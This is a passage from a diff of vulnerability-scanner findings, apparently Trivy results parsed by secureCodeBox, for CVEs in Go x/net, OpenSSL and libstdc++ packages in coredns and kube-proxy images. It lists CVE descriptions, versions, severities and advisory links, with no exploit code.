"https://lists.debian.org/debian-lts-announce/2023/04/msg00021.html", + "value": "https://linux.oracle.com/cve/CVE-2022-4304.html", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-44716", + "value": "https://linux.oracle.com/errata/ELSA-2023-2932.html", }, { "type": "URL", - "value": "https://pkg.go.dev/vuln/GO-2022-0288", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-4304", }, { "type": "URL", - "value": "https://security.gentoo.org/glsa/202208-02", + "value": "https://rustsec.org/advisories/RUSTSEC-2023-0007.html", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20220121-0002/", + "value": "https://ubuntu.com/security/notices/USN-5844-1", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2021-44716", + "value": "https://www.cve.org/CVERecord?id=CVE-2022-4304", + }, + { + "type": "URL", + "value": "https://www.openssl.org/news/secadv/20230207.txt", }, ], - "severity": "HIGH", + "severity": "MEDIUM", }, { "attributes": { - "fixedVersion": "0.0.0-20220906165146-f3363e06e74c", - "foundIn": "Target: 'coredns' / Class: 'lang-pkgs' / Type: 'gobinary'", - "id": "CVE-2022-27664", - "installedVersion": "v0.0.0-20200707034311-ab3426394381", - "packageName": "golang.org/x/net", + "fixedVersion": "1.1.1n-0+deb10u5", + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2023-0465", + "installedVersion": "1.1.1d-0+deb10u6", + "packageName": "libssl1.1", "references": [ - "https://access.redhat.com/errata/RHSA-2023:2357", - "https://access.redhat.com/security/cve/CVE-2022-27664", - "https://bugzilla.redhat.com/2107371", - "https://bugzilla.redhat.com/2107374", - "https://bugzilla.redhat.com/2107383", - "https://bugzilla.redhat.com/2107386", - "https://bugzilla.redhat.com/2107388", - "https://bugzilla.redhat.com/2113814", - "https://bugzilla.redhat.com/2124669", - "https://bugzilla.redhat.com/2132868", - "https://bugzilla.redhat.com/2132872", - "https://bugzilla.redhat.com/2161274", - "https://bugzilla.redhat.com/show_bug.cgi?id=1913333", - "https://bugzilla.redhat.com/show_bug.cgi?id=1913338", - "https://bugzilla.redhat.com/show_bug.cgi?id=2107371", - "https://bugzilla.redhat.com/show_bug.cgi?id=2107374", - "https://bugzilla.redhat.com/show_bug.cgi?id=2107383", - "https://bugzilla.redhat.com/show_bug.cgi?id=2107386", - "https://bugzilla.redhat.com/show_bug.cgi?id=2107388", - "https://bugzilla.redhat.com/show_bug.cgi?id=2113814", - "https://bugzilla.redhat.com/show_bug.cgi?id=2124669", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-28851", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-28852", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1705", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-27664", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30630", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30632", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30635", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-32148", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-32189", - "https://errata.almalinux.org/9/ALSA-2023-2357.html", - "https://errata.rockylinux.org/RLSA-2022:7129", - "https://github.com/advisories/GHSA-69cg-p879-7622", - "https://github.com/golang/go/commit/5bc9106458fc07851ac324a4157132a91b1f3479 (go1.18.6)", - "https://github.com/golang/go/commit/9cfe4e258b1c9d4a04a42539c21c7bdb2e227824 (go1.19.1)", - "https://github.com/golang/go/issues/54658", - "https://go.dev/cl/428735", - "https://go.dev/issue/54658", - "https://groups.google.com/g/golang-announce", - "https://groups.google.com/g/golang-announce/c/x49AQzIVX-s", - "https://groups.google.com/g/golang-announce/c/x49AQzIVX-s/m/0tgO0pjiBQAJ", - "https://linux.oracle.com/cve/CVE-2022-27664.html", - "https://linux.oracle.com/errata/ELSA-2023-2802.html", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/JXKTHIGE5F576MAPFYCIJXNRGBSPISUF/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/TXS2OQ57KZC5XZKK5UW4SYKPVQAHIOJX/", - "https://nvd.nist.gov/vuln/detail/CVE-2022-27664", - "https://pkg.go.dev/vuln/GO-2022-0969", - "https://security.gentoo.org/glsa/202209-26", - "https://security.netapp.com/advisory/ntap-20220923-0004/", - "https://ubuntu.com/security/notices/USN-6038-1", - "https://www.cve.org/CVERecord?id=CVE-2022-27664", + "https://access.redhat.com/security/cve/CVE-2023-0465", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0465", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=10325176f3d3e98c6e2b3bf5ab1e3b334de6947a", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=1dd43e0709fece299b15208f36cc7c76209ba0bb", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=b013765abfa80036dc779dd0e50602c57bb3bf95", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=facfb1ab745646e97a1920977ae4a9965ea61d5c", + "https://linux.oracle.com/cve/CVE-2023-0465.html", + "https://linux.oracle.com/errata/ELSA-2023-3722.html", + "https://lists.debian.org/debian-lts-announce/2023/06/msg00011.html", + "https://nvd.nist.gov/vuln/detail/CVE-2023-0465", + "https://security.netapp.com/advisory/ntap-20230414-0001/", + "https://ubuntu.com/security/notices/USN-6039-1", + "https://www.cve.org/CVERecord?id=CVE-2023-0465", + "https://www.debian.org/security/2023/dsa-5417", + "https://www.openssl.org/news/secadv/20230328.txt", ], }, "category": "Vulnerability", - "description": "In net/http in Go before 1.18.6 and 1.19.x before 1.19.1, attackers can cause a denial of service because an HTTP/2 connection can hang during closing if shutdown were preempted by a fatal error.", - "location": "scb://trivy/?Namespace=kube-system&Kind=Deployment&Name=coredns", + "description": +"Applications that use a non-default option when verifying certificates may be +vulnerable to an attack from a malicious CA to circumvent certain checks. + +Invalid certificate policies in leaf certificates are silently ignored by +OpenSSL and other certificate policy checks are skipped for that certificate. +A malicious CA could use this to deliberately assert invalid certificate policies +in order to circumvent policy checking on the certificate altogether. + +Policy processing is disabled by default but can be enabled by passing +the \`-policy' argument to the command line utilities or by calling the +\`X509_VERIFY_PARAM_set1_policies()' function." +, + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", "mitigation": undefined, - "name": "handle server errors after sending GOAWAY", + "name": "Invalid certificate policies in leaf certificates are silently ignored", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2022-27664", + "value": "https://avd.aquasec.com/nvd/cve-2023-0465", }, { "type": "URL", - "value": "https://access.redhat.com/errata/RHSA-2023:2357", + "value": "https://access.redhat.com/security/cve/CVE-2023-0465", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2022-27664", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0465", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2107371", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=10325176f3d3e98c6e2b3bf5ab1e3b334de6947a", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2107374", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=1dd43e0709fece299b15208f36cc7c76209ba0bb", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2107383", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=b013765abfa80036dc779dd0e50602c57bb3bf95", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2107386", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=facfb1ab745646e97a1920977ae4a9965ea61d5c", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2107388", + "value": "https://linux.oracle.com/cve/CVE-2023-0465.html", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2113814", + "value": "https://linux.oracle.com/errata/ELSA-2023-3722.html", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2124669", + "value": "https://lists.debian.org/debian-lts-announce/2023/06/msg00011.html", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2132868", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2023-0465", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2132872", + "value": "https://security.netapp.com/advisory/ntap-20230414-0001/", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2161274", + "value": "https://ubuntu.com/security/notices/USN-6039-1", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1913333", + "value": "https://www.cve.org/CVERecord?id=CVE-2023-0465", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1913338", + "value": "https://www.debian.org/security/2023/dsa-5417", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2107371", + "value": "https://www.openssl.org/news/secadv/20230328.txt", }, + ], + "severity": "MEDIUM", + }, + { + "attributes": { + "fixedVersion": "1.1.1n-0+deb10u5", + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2023-0466", + "installedVersion": "1.1.1d-0+deb10u6", + "packageName": "libssl1.1", + "references": [ + "https://access.redhat.com/security/cve/CVE-2023-0466", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0466", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=0d16b7e99aafc0b4a6d729eec65a411a7e025f0a", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=51e8a84ce742db0f6c70510d0159dad8f7825908", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=73398dea26de9899fb4baa94098ad0a61f435c72", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=fc814a30fc4f0bc54fcea7d9a7462f5457aab061", + "https://linux.oracle.com/cve/CVE-2023-0466.html", + "https://linux.oracle.com/errata/ELSA-2023-3722.html", + "https://lists.debian.org/debian-lts-announce/2023/06/msg00011.html", + "https://nvd.nist.gov/vuln/detail/CVE-2023-0466", + "https://security.netapp.com/advisory/ntap-20230414-0001/", + "https://ubuntu.com/security/notices/USN-6039-1", + "https://www.cve.org/CVERecord?id=CVE-2023-0466", + "https://www.debian.org/security/2023/dsa-5417", + "https://www.openssl.org/news/secadv/20230328.txt", + ], + }, + "category": "Vulnerability", + "description": +"The function X509_VERIFY_PARAM_add0_policy() is documented to +implicitly enable the certificate policy check when doing certificate +verification. However the implementation of the function does not +enable the check which allows certificates with invalid or incorrect +policies to pass the certificate verification. + +As suddenly enabling the policy check could break existing deployments it was +decided to keep the existing behavior of the X509_VERIFY_PARAM_add0_policy() +function. + +Instead the applications that require OpenSSL to perform certificate +policy check need to use X509_VERIFY_PARAM_set1_policies() or explicitly +enable the policy check by calling X509_VERIFY_PARAM_set_flags() with +the X509_V_FLAG_POLICY_CHECK flag argument. + +Certificate policy checks are disabled by default in OpenSSL and are not +commonly used by applications." +, + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "mitigation": undefined, + "name": "Certificate policy check not enabled", + "references": [ { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2107374", + "value": "https://avd.aquasec.com/nvd/cve-2023-0466", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2107383", + "value": "https://access.redhat.com/security/cve/CVE-2023-0466", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2107386", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0466", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2107388", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=0d16b7e99aafc0b4a6d729eec65a411a7e025f0a", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2113814", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=51e8a84ce742db0f6c70510d0159dad8f7825908", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2124669", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=73398dea26de9899fb4baa94098ad0a61f435c72", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-28851", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=fc814a30fc4f0bc54fcea7d9a7462f5457aab061", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-28852", + "value": "https://linux.oracle.com/cve/CVE-2023-0466.html", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1705", + "value": "https://linux.oracle.com/errata/ELSA-2023-3722.html", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-27664", + "value": "https://lists.debian.org/debian-lts-announce/2023/06/msg00011.html", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30630", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2023-0466", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30632", + "value": "https://security.netapp.com/advisory/ntap-20230414-0001/", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30635", + "value": "https://ubuntu.com/security/notices/USN-6039-1", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-32148", + "value": "https://www.cve.org/CVERecord?id=CVE-2023-0466", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-32189", + "value": "https://www.debian.org/security/2023/dsa-5417", }, { "type": "URL", - "value": "https://errata.almalinux.org/9/ALSA-2023-2357.html", + "value": "https://www.openssl.org/news/secadv/20230328.txt", }, + ], + "severity": "MEDIUM", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2007-6755", + "installedVersion": "1.1.1d-0+deb10u6", + "packageName": "libssl1.1", + "references": [ + "http://arstechnica.com/security/2013/09/stop-using-nsa-influence-code-in-our-product-rsa-tells-customers/", + "http://blog.cryptographyengineering.com/2013/09/rsa-warns-developers-against-its-own.html", + "http://blog.cryptographyengineering.com/2013/09/the-many-flaws-of-dualecdrbg.html", + "http://rump2007.cr.yp.to/15-shumow.pdf", + "http://stream.wsj.com/story/latest-headlines/SS-2-63399/SS-2-332655/", + "http://threatpost.com/in-wake-of-latest-crypto-revelations-everything-is-suspect", + "http://www.securityfocus.com/bid/63657", + "https://access.redhat.com/security/cve/CVE-2007-6755", + "https://nvd.nist.gov/vuln/detail/CVE-2007-6755", + "https://www.cve.org/CVERecord?id=CVE-2007-6755", + "https://www.schneier.com/blog/archives/2007/11/the_strange_sto.html", + ], + }, + "category": "Vulnerability", + "description": "The NIST SP 800-90A default statement of the Dual Elliptic Curve Deterministic Random Bit Generation (Dual_EC_DRBG) algorithm contains point Q constants with a possible relationship to certain "skeleton key" values, which might allow context-dependent attackers to defeat cryptographic protection mechanisms by leveraging knowledge of those values. NOTE: this is a preliminary CVE for Dual_EC_DRBG; future research may provide additional details about point Q and associated attacks, and could potentially lead to a RECAST or REJECT of this CVE.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "mitigation": undefined, + "name": "Dual_EC_DRBG: weak pseudo random number generator", + "references": [ { "type": "URL", - "value": "https://errata.rockylinux.org/RLSA-2022:7129", + "value": "https://avd.aquasec.com/nvd/cve-2007-6755", }, { "type": "URL", - "value": "https://github.com/advisories/GHSA-69cg-p879-7622", + "value": "http://arstechnica.com/security/2013/09/stop-using-nsa-influence-code-in-our-product-rsa-tells-customers/", }, { "type": "URL", - "value": "https://github.com/golang/go/commit/5bc9106458fc07851ac324a4157132a91b1f3479 (go1.18.6)", + "value": "http://blog.cryptographyengineering.com/2013/09/rsa-warns-developers-against-its-own.html", }, { "type": "URL", - "value": "https://github.com/golang/go/commit/9cfe4e258b1c9d4a04a42539c21c7bdb2e227824 (go1.19.1)", + "value": "http://blog.cryptographyengineering.com/2013/09/the-many-flaws-of-dualecdrbg.html", }, { "type": "URL", - "value": "https://github.com/golang/go/issues/54658", + "value": "http://rump2007.cr.yp.to/15-shumow.pdf", }, { "type": "URL", - "value": "https://go.dev/cl/428735", + "value": "http://stream.wsj.com/story/latest-headlines/SS-2-63399/SS-2-332655/", }, { "type": "URL", - "value": "https://go.dev/issue/54658", + "value": "http://threatpost.com/in-wake-of-latest-crypto-revelations-everything-is-suspect", }, { "type": "URL", - "value": "https://groups.google.com/g/golang-announce", + "value": "http://www.securityfocus.com/bid/63657", }, { "type": "URL", - "value": "https://groups.google.com/g/golang-announce/c/x49AQzIVX-s", + "value": "https://access.redhat.com/security/cve/CVE-2007-6755", }, { "type": "URL", - "value": "https://groups.google.com/g/golang-announce/c/x49AQzIVX-s/m/0tgO0pjiBQAJ", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2007-6755", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2022-27664.html", + "value": "https://www.cve.org/CVERecord?id=CVE-2007-6755", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2023-2802.html", + "value": "https://www.schneier.com/blog/archives/2007/11/the_strange_sto.html", + }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2010-0928", + "installedVersion": "1.1.1d-0+deb10u6", + "packageName": "libssl1.1", + "references": [ + "http://rdist.root.org/2010/03/08/attacking-rsa-exponentiation-with-fault-injection/", + "http://www.eecs.umich.edu/%7Evaleria/research/publications/DATE10RSA.pdf", + "http://www.networkworld.com/news/2010/030410-rsa-security-attack.html", + "http://www.osvdb.org/62808", + "http://www.theregister.co.uk/2010/03/04/severe_openssl_vulnerability/", + "https://access.redhat.com/security/cve/CVE-2010-0928", + "https://exchange.xforce.ibmcloud.com/vulnerabilities/56750", + "https://nvd.nist.gov/vuln/detail/CVE-2010-0928", + "https://www.cve.org/CVERecord?id=CVE-2010-0928", + ], + }, + "category": "Vulnerability", + "description": "OpenSSL 0.9.8i on the Gaisler Research LEON3 SoC on the Xilinx Virtex-II Pro FPGA uses a Fixed Width Exponentiation (FWE) algorithm for certain signature calculations, and does not verify the signature before providing it to a caller, which makes it easier for physically proximate attackers to determine the private key via a modified supply voltage for the microprocessor, related to a "fault-based attack."", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "mitigation": undefined, + "name": "openssl: RSA authentication weakness", + "references": [ + { + "type": "URL", + "value": "https://avd.aquasec.com/nvd/cve-2010-0928", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/JXKTHIGE5F576MAPFYCIJXNRGBSPISUF/", + "value": "http://rdist.root.org/2010/03/08/attacking-rsa-exponentiation-with-fault-injection/", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/TXS2OQ57KZC5XZKK5UW4SYKPVQAHIOJX/", + "value": "http://www.eecs.umich.edu/%7Evaleria/research/publications/DATE10RSA.pdf", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-27664", + "value": "http://www.networkworld.com/news/2010/030410-rsa-security-attack.html", }, { "type": "URL", - "value": "https://pkg.go.dev/vuln/GO-2022-0969", + "value": "http://www.osvdb.org/62808", }, { "type": "URL", - "value": "https://security.gentoo.org/glsa/202209-26", + "value": "http://www.theregister.co.uk/2010/03/04/severe_openssl_vulnerability/", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20220923-0004/", + "value": "https://access.redhat.com/security/cve/CVE-2010-0928", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-6038-1", + "value": "https://exchange.xforce.ibmcloud.com/vulnerabilities/56750", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2022-27664", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2010-0928", + }, + { + "type": "URL", + "value": "https://www.cve.org/CVERecord?id=CVE-2010-0928", }, ], - "severity": "HIGH", + "severity": "LOW", }, { "attributes": { - "fixedVersion": "0.7.0", - "foundIn": "Target: 'coredns' / Class: 'lang-pkgs' / Type: 'gobinary'", - "id": "CVE-2022-41723", - "installedVersion": "v0.0.0-20200707034311-ab3426394381", - "packageName": "golang.org/x/net", + "fixedVersion": undefined, + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2018-12886", + "installedVersion": "8.3.0-6", + "packageName": "libstdc++6", "references": [ - "https://access.redhat.com/security/cve/CVE-2022-41723", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-41723", - "https://github.com/advisories/GHSA-vvpx-j8f3-3w6h", - "https://go.dev/cl/468135", - "https://go.dev/cl/468295", - "https://go.dev/issue/57855", - "https://groups.google.com/g/golang-announce/c/V0aBFqaFs_E", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/4MA5XS5DAOJ5PKKNG5TUXKPQOFHT5VBC/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RGW7GE2Z32ZT47UFAQFDRQE33B7Q7LMT/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RLBQ3A7ROLEQXQLXFDLNJ7MYPKG5GULE/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/XX3IMUTZKRQ73PBZM4E2JP4BKYH4C6XE/", - "https://nvd.nist.gov/vuln/detail/CVE-2022-41723", - "https://pkg.go.dev/vuln/GO-2023-1571", - "https://vuln.go.dev/ID/GO-2023-1571.json", - "https://www.cve.org/CVERecord?id=CVE-2022-41723", + "https://access.redhat.com/security/cve/CVE-2018-12886", + "https://gcc.gnu.org/viewcvs/gcc/trunk/gcc/config/arm/arm-protos.h?revision=266379&view=markup", + "https://nvd.nist.gov/vuln/detail/CVE-2018-12886", + "https://www.cve.org/CVERecord?id=CVE-2018-12886", + "https://www.gnu.org/software/gcc/gcc-8/changes.html", ], }, "category": "Vulnerability", - "description": "A maliciously crafted HTTP/2 stream could cause excessive CPU consumption in the HPACK decoder, sufficient to cause a denial of service from a small number of small requests.", - "location": "scb://trivy/?Namespace=kube-system&Kind=Deployment&Name=coredns", + "description": "stack_protect_prologue in cfgexpand.c and stack_protect_epilogue in function.c in GNU Compiler Collection (GCC) 4.1 through 8 (under certain circumstances) generate instruction sequences when targeting ARM targets that spill the address of the stack protector guard, which allows an attacker to bypass the protection of -fstack-protector, -fstack-protector-all, -fstack-protector-strong, and -fstack-protector-explicit against stack overflow by controlling what the stack canary is compared against.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", "mitigation": undefined, - "name": "avoid quadratic complexity in HPACK decoding", + "name": "gcc: spilling of stack protection address in cfgexpand.c and function.c leads to stack-overflow protection bypass", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2022-41723", + "value": "https://avd.aquasec.com/nvd/cve-2018-12886", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2022-41723", + "value": "https://access.redhat.com/security/cve/CVE-2018-12886", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-41723", + "value": "https://gcc.gnu.org/viewcvs/gcc/trunk/gcc/config/arm/arm-protos.h?revision=266379&view=markup", }, { "type": "URL", - "value": "https://github.com/advisories/GHSA-vvpx-j8f3-3w6h", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2018-12886", }, { "type": "URL", - "value": "https://go.dev/cl/468135", + "value": "https://www.cve.org/CVERecord?id=CVE-2018-12886", }, { "type": "URL", - "value": "https://go.dev/cl/468295", + "value": "https://www.gnu.org/software/gcc/gcc-8/changes.html", }, + ], + "severity": "HIGH", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2019-15847", + "installedVersion": "8.3.0-6", + "packageName": "libstdc++6", + "references": [ + "http://lists.opensuse.org/opensuse-security-announce/2019-10/msg00056.html", + "http://lists.opensuse.org/opensuse-security-announce/2019-10/msg00057.html", + "http://lists.opensuse.org/opensuse-security-announce/2020-05/msg00058.html", + "https://access.redhat.com/security/cve/CVE-2019-15847", + "https://gcc.gnu.org/bugzilla/show_bug.cgi?id=91481", + "https://linux.oracle.com/cve/CVE-2019-15847.html", + "https://linux.oracle.com/errata/ELSA-2020-1864.html", + "https://nvd.nist.gov/vuln/detail/CVE-2019-15847", + "https://www.cve.org/CVERecord?id=CVE-2019-15847", + ], + }, + "category": "Vulnerability", + "description": "The POWER9 backend in GNU Compiler Collection (GCC) before version 10 could optimize multiple calls of the __builtin_darn intrinsic into a single call, thus reducing the entropy of the random number generator. This occurred because a volatile operation was not specified. For example, within a single execution of a program, the output of every __builtin_darn() call may be the same.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "mitigation": undefined, + "name": "gcc: POWER9 "DARN" RNG intrinsic produces repeated output", + "references": [ { "type": "URL", - "value": "https://go.dev/issue/57855", + "value": "https://avd.aquasec.com/nvd/cve-2019-15847", }, { "type": "URL", - "value": "https://groups.google.com/g/golang-announce/c/V0aBFqaFs_E", + "value": "http://lists.opensuse.org/opensuse-security-announce/2019-10/msg00056.html", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/4MA5XS5DAOJ5PKKNG5TUXKPQOFHT5VBC/", + "value": "http://lists.opensuse.org/opensuse-security-announce/2019-10/msg00057.html", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RGW7GE2Z32ZT47UFAQFDRQE33B7Q7LMT/", + "value": "http://lists.opensuse.org/opensuse-security-announce/2020-05/msg00058.html", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RLBQ3A7ROLEQXQLXFDLNJ7MYPKG5GULE/", + "value": "https://access.redhat.com/security/cve/CVE-2019-15847", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/XX3IMUTZKRQ73PBZM4E2JP4BKYH4C6XE/", + "value": "https://gcc.gnu.org/bugzilla/show_bug.cgi?id=91481", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-41723", + "value": "https://linux.oracle.com/cve/CVE-2019-15847.html", }, { "type": "URL", - "value": "https://pkg.go.dev/vuln/GO-2023-1571", + "value": "https://linux.oracle.com/errata/ELSA-2020-1864.html", }, { "type": "URL", - "value": "https://vuln.go.dev/ID/GO-2023-1571.json", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2019-15847", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2022-41723", + "value": "https://www.cve.org/CVERecord?id=CVE-2019-15847", }, ], "severity": "HIGH", }, { "attributes": { - "fixedVersion": "0.0.0-20210428140749-89ef3d95e781", - "foundIn": "Target: 'coredns' / Class: 'lang-pkgs' / Type: 'gobinary'", - "id": "CVE-2021-31525", - "installedVersion": "v0.0.0-20200707034311-ab3426394381", - "packageName": "golang.org/x/net", + "fixedVersion": undefined, + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2019-3843", + "installedVersion": "241-7~deb10u7", + "packageName": "libsystemd0", "references": [ - "https://access.redhat.com/security/cve/CVE-2021-31525", - "https://github.com/advisories/GHSA-h86h-8ppg-mxmh", - "https://github.com/golang/go/issues/45710", - "https://go.dev/cl/313069", - "https://go.dev/issue/45710", - "https://go.googlesource.com/net/+/89ef3d95e781148a0951956029c92a211477f7f9", - "https://groups.google.com/g/golang-announce/c/cu9SP4eSXMc", - "https://linux.oracle.com/cve/CVE-2021-31525.html", - "https://linux.oracle.com/errata/ELSA-2021-3076.html", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ISRZZ6NY5R2TBYE72KZFOCO25TEUQTBF/", - "https://nvd.nist.gov/vuln/detail/CVE-2021-31525", - "https://pkg.go.dev/vuln/GO-2022-0236", - "https://security.gentoo.org/glsa/202208-02", - "https://www.cve.org/CVERecord?id=CVE-2021-31525", + "http://www.securityfocus.com/bid/108116", + "https://access.redhat.com/security/cve/CVE-2019-3843", + "https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2019-3843", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-3843", + "https://github.com/systemd/systemd-stable/pull/54 (backport for v241-stable)", + "https://linux.oracle.com/cve/CVE-2019-3843.html", + "https://linux.oracle.com/errata/ELSA-2020-1794.html", + 